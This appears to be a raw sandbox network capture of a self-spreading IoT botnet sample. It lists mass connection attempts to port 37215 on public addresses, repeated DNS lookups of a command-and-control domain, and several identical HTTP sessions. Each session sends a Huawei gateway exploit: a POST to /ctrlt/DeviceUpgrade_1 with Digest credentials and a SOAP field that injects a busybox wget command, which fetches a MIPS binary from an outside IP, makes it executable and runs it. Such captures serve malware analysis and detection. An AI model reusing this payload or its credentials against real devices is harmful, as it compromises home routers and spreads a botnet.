                                                    Jul 10, 2024 08:26:13.815920115 CEST4708337215192.168.2.14157.141.15.19
                                                    Jul 10, 2024 08:26:13.815920115 CEST3911037215192.168.2.14197.104.98.226
                                                    Jul 10, 2024 08:26:13.815920115 CEST4708337215192.168.2.14192.198.154.55
                                                    Jul 10, 2024 08:26:13.815920115 CEST5710837215192.168.2.14150.129.41.142
                                                    Jul 10, 2024 08:26:13.815920115 CEST4708337215192.168.2.14157.150.153.190
                                                    Jul 10, 2024 08:26:13.815920115 CEST5733237215192.168.2.14190.23.119.116
                                                    Jul 10, 2024 08:26:13.816246033 CEST3721550136197.130.93.226192.168.2.14
                                                    Jul 10, 2024 08:26:13.816824913 CEST372155630477.99.78.105192.168.2.14
                                                    Jul 10, 2024 08:26:13.816886902 CEST4708337215192.168.2.1420.11.185.103
                                                    Jul 10, 2024 08:26:13.816886902 CEST4708337215192.168.2.1441.132.0.49
                                                    Jul 10, 2024 08:26:13.816886902 CEST4708337215192.168.2.14122.34.34.108
                                                    Jul 10, 2024 08:26:13.816886902 CEST3587237215192.168.2.14197.159.168.10
                                                    Jul 10, 2024 08:26:13.816886902 CEST3964437215192.168.2.1488.223.157.166
                                                    Jul 10, 2024 08:26:13.816886902 CEST3823237215192.168.2.1441.130.69.12
                                                    Jul 10, 2024 08:26:13.816886902 CEST4569237215192.168.2.14197.120.226.35
                                                    Jul 10, 2024 08:26:13.816886902 CEST4569237215192.168.2.14197.120.226.35
                                                    Jul 10, 2024 08:26:13.816955090 CEST4805837215192.168.2.1441.178.8.111
                                                    Jul 10, 2024 08:26:13.816955090 CEST4805837215192.168.2.1441.178.8.111
                                                    Jul 10, 2024 08:26:13.816955090 CEST5407037215192.168.2.14197.153.14.104
                                                    Jul 10, 2024 08:26:13.816955090 CEST5407037215192.168.2.14197.153.14.104
                                                    Jul 10, 2024 08:26:13.816955090 CEST5407037215192.168.2.14197.153.14.104
                                                    Jul 10, 2024 08:26:13.816955090 CEST5901037215192.168.2.1481.248.239.7
                                                    Jul 10, 2024 08:26:13.816955090 CEST5930437215192.168.2.14157.101.103.193
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 10, 2024 08:26:09.673825026 CEST192.168.2.148.8.8.80x7e03Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:14.606972933 CEST192.168.2.148.8.8.80x5300Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:14.606972933 CEST192.168.2.148.8.8.80x48f7Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                    Jul 10, 2024 08:26:21.720391035 CEST192.168.2.148.8.8.80x2801Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:28.584110022 CEST192.168.2.148.8.8.80x81caStandard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:33.413824081 CEST192.168.2.148.8.8.80x8c92Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:38.641052961 CEST192.168.2.148.8.8.80x73f5Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:42.669697046 CEST192.168.2.148.8.8.80x954eStandard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:53.030072927 CEST192.168.2.148.8.8.80x4314Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:03.932852030 CEST192.168.2.148.8.8.80x3ff0Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:13.991583109 CEST192.168.2.148.8.8.80x13a8Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:24.093631029 CEST192.168.2.148.8.8.80x6384Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:34.002923965 CEST192.168.2.148.8.8.80x9d4eStandard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:39.292452097 CEST192.168.2.148.8.8.80xd1dStandard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:42.134860992 CEST192.168.2.148.8.8.80xac0eStandard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:51.201464891 CEST192.168.2.148.8.8.80xe873Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:55.775118113 CEST192.168.2.148.8.8.80x2d37Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:00.244008064 CEST192.168.2.148.8.8.80x3ed3Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:02.885456085 CEST192.168.2.148.8.8.80x5955Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:04.908577919 CEST192.168.2.148.8.8.80xaf3dStandard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:09.051892042 CEST192.168.2.148.8.8.80x336eStandard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:13.875039101 CEST192.168.2.148.8.8.80x3f18Standard query (0)botvectors.mineheaven.orgA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 10, 2024 08:26:09.738503933 CEST8.8.8.8192.168.2.140x7e03No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:14.613811016 CEST8.8.8.8192.168.2.140x5300No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:14.613811016 CEST8.8.8.8192.168.2.140x5300No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:21.727782011 CEST8.8.8.8192.168.2.140x2801No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:28.591902971 CEST8.8.8.8192.168.2.140x81caNo error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:33.423065901 CEST8.8.8.8192.168.2.140x8c92No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:38.652556896 CEST8.8.8.8192.168.2.140x73f5No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:42.786427021 CEST8.8.8.8192.168.2.140x954eNo error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:26:53.037333965 CEST8.8.8.8192.168.2.140x4314No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:03.940975904 CEST8.8.8.8192.168.2.140x3ff0No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:14.014365911 CEST8.8.8.8192.168.2.140x13a8No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:24.102533102 CEST8.8.8.8192.168.2.140x6384No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:34.137968063 CEST8.8.8.8192.168.2.140x9d4eNo error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:39.310444117 CEST8.8.8.8192.168.2.140xd1dNo error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:42.143070936 CEST8.8.8.8192.168.2.140xac0eNo error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:51.209023952 CEST8.8.8.8192.168.2.140xe873No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:27:55.787103891 CEST8.8.8.8192.168.2.140x2d37No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:00.254086971 CEST8.8.8.8192.168.2.140x3ed3No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:02.894839048 CEST8.8.8.8192.168.2.140x5955No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:05.006030083 CEST8.8.8.8192.168.2.140xaf3dNo error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:09.059564114 CEST8.8.8.8192.168.2.140x336eNo error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Jul 10, 2024 08:28:13.883059978 CEST8.8.8.8192.168.2.140x3f18No error (0)botvectors.mineheaven.org51.79.141.54A (IP address)IN (0x0001)false
                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    0192.168.2.1452016157.8.45.23537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.053368092 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.434489965 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    1192.168.2.1438496157.5.249.16437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.053368092 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.434489965 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    2192.168.2.1433540157.19.87.8037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.053368092 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.434489965 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    3192.168.2.1451348210.21.110.25137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.070877075 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.446922064 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
